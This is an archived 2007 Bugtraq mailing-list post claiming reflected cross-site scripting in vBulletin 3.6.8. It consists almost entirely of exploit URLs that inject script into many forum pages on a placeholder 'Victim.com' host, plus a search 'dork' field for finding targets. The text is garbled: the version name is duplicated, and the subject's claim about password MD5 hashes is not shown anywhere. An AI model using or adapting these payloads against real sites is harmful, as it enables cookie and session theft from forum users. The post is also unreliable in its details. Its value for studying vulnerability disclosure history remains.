| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: 17 Aug 2007 10:56:04 -0000
From: RaeD@...Mail.Com
To: bugtraq@...urityfocus.com
Subject: vBulletin V3.6.8 XSS Password Md5 Hash
#Discovred By : Hasadya Raed
----------------
#Contact : RaeD@...Mail.Cpm
----------------
#Script: vBulletin V3.6.8ulletin V3.6.8
----------------
#Dork: vBulletin V3.6.8ulletin V3.6.8
----------------
#Exploit :
http://www.Victim.com/vBulletin V3.6.8ulletin V3.6.8/faq.php?s=&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript&match=all&titlesonly=0
http://www.Victim.com/vBulletin V3.6.8ulletin V3.6.8/member.php?u=1=s'&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript&match=all&titlesonly=1
http://www.Victim.com/vBulletin V3.6.8/index.php?s=<script>alert('document.cookie')</script>
http://www.Victim.com/vBulletin V3.6.8/faq.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript&match=all&titlesonly=0
http://www.Victim.com/vBulletin V3.6.8/memberlist.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript&match=all&titlesonly=0
http://www.Victim.com/vBulletin V3.6.8/calendar.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript&match=all&titlesonly=0
http://www.Victim.com/vBulletin V3.6.8/search.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript&match=all&titlesonly=0
http://www.Victim.com/vBulletin V3.6.8/search.php?do=getdaily"&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript&match=all&titlesonly=0
http://www.Victim.com/vBulletin V3.6.8/forumdisplay.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript&match=all&titlesonly=0
http://www.Victim.com/vBulletin V3.6.8/forumdisplay.php?do=markread"&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript&match=all&titlesonly=0
http://www.Victim.com/vBulletin V3.6.8/forumdisplay.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript&match=all&titlesonly=0
http://www.Victim.com/vBulletin V3.6.8/forumdisplay.php?f=1"&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript&match=all&titlesonly=0
http://www.Victim.com/vBulletin V3.6.8/forumdisplay.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript&match=all&titlesonly=0
http://www.Victim.com/vBulletin V3.6.8/forumdisplay.php?f=2"&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript&match=all&titlesonly=0
http://www.Victim.com/vBulletin V3.6.8/showgroups.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript&match=all&titlesonly=0
http://www.Victim.com/vBulletin V3.6.8/online.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript&match=all&titlesonly=0
http://www.Victim.com/vBulletin V3.6.8/member.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript&match=all&titlesonly=0
http://www.Victim.com/vBulletin V3.6.8/sendmessage.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript&match=all&titlesonly=0
Powered by blists - more mailing lists